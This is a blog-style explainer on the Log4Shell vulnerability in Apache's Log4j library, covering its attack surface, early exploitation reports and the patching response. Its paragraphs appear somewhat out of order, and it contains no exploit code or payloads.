Remediation techniques shared by the larger information security community also proved helpful to mitigate risk. Companies that use the library in enterprise software also made updates and security patches available to their customers shortly after the vulnerability was identified.Īt the same time, companies that offer web application firewalls were quick to block various Log4Shell exploitation payloads. The Apache Foundation released patches for various software projects using vulnerable versions of the Log4j library. While this could be an instance of a phenomenon known in security research as “parallel vulnerability discovery,” - where a particular undisclosed vulnerability may be discovered by multiple parties at the same time - it could also suggest that knowledge about the vulnerability was shared with others by an individual or group who happened to discover it. At the same time, the blog post also notes that a small set of exploitation attempts, or “test runs,” were made more than a week prior to the vulnerability being publicly disclosed. Has the vulnerability been exploited yet?Ĭloudflare, a company that manages a sizeable portion of Internet traffic, mentioned in a blog post analysing the Log4j vulnerability that attackers started attempting to exploit the vulnerability a mere nine minutes after it had been publicly disclosed. Many proprietary applications developed and used by large companies rely on the Log4j library for logging purposes and are similarly vulnerable. An advisory issued by the Apache Foundation mentions at least a dozen other software projects backed by the organisation as being affected as a result of Log4Shell.Īt the same time, it is not just open source software that is affected. The vulnerability presents a large attack surface particularly due to the ubiquitous use of the Log4j library in Java software. However, it has been noted by some that the possibility of remote code execution on live systems is circumstantially limited, and that it varies from one environment to another. An attacker exploiting the vulnerability could potentially execute arbitrary, malicious code on an affected system. The vulnerability affects a component of the library meant to allow for the insertion of arbitrary system and Java environment variables within software logs. Companies that use the library in enterprise software also made updates and security patches available to their customers.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |